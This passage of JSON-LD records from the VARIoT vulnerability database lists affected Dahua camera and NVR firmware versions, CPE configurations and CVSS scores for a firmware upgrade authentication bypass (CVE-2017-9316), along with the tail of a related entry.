            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-07T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "date": "2017-12-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "date": "2017-11-13T16:29:00.327000",
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "date": "2017-05-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-07T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "date": "2017-12-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "date": "2017-11-29T18:53:03.257000",
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "date": "2017-11-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua NVR Authentication vulnerabilities in model software",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201711-1048

    Vulnerability from variot - Updated: 2023-12-18 13:14

    Firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by internal Debug function. This particular function was used for problem analysis and performance tuning during product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution. plural Dahua Technology The product contains authentication vulnerabilities.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. DahuaIPC-HDW4300S is the IP camera equipment of Dahua Company of China. The following products are affected: Dahua IPC-HDW4300S; NVR11HS; IPC-HFW4X00; IPC-HDW4X00; IPC-HDBW4X00;

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-1048",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.0.r.20150206"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20170305"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.1.r.20150420"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20160803"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20161226"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20160409"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.2.r.20150715"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20170321"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.3.r.20150921"
          },
          {
            "model": "nvr11hs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0000.5.r.20160603"
          },
          {
            "model": "ipc-hfw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdbw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0005.0.r.20141205"
          },
          {
            "model": "ipc-hfw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hdbw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hdw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdbw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hfw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.240.0009.0.r.20131015"
          },
          {
            "model": "ipc-hdw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hdw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0000.0.r.20140419"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0008.0.r.20150710"
          },
          {
            "model": "ipc-hf5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0002.0.r.20140724"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.0.r.20131231"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0002.0.r.20140621"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdw4300s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0007.0.r.20150409"
          },
          {
            "model": "ipc-hdw4x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hdbw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hf5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.3.r.20150312"
          },
          {
            "model": "ipc-hfw5x00",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.420.0006.0.r.20150311"
          },
          {
            "model": "ipc-hdbw4x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw5x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdw4300s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdw4x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdw5x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hf5x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw4x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw5x00",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr11hs",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hdw1xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hdw2xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hdw4xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hfw1xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hfw2xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-ipc-hfw4xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-sd6cxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-nvr1xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-hcvr4xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh-hcvr5xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security nvr11hs",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.2.r.20150715:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.3.r.20150921:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160409:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160603:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.0.r.20150206:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20161226:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20170321:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.1.r.20150420:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160803:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20170305:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr11hs:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0005.0.r.20141205:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0007.0.r.20150409:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0008.0.r.20150710:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.240.0009.0.r.20131015:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0000.0.r.20140419:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0002.0.r.20140724:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.400.0000.0.r.20131231:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0002.0.r.20140621:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4300s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw4x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw4x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf5x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw5x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw5x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw5x00:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          }
        ]
      },
      "cve": "CVE-2017-9316",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 5.8,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2017-9316",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-38226",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-117519",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.2,
                "impactScore": 4.2,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2017-9316",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-9316",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-38226",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201705-1392",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-117519",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-9316",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38226"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117519"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-9316"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011146"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9316"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1392"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
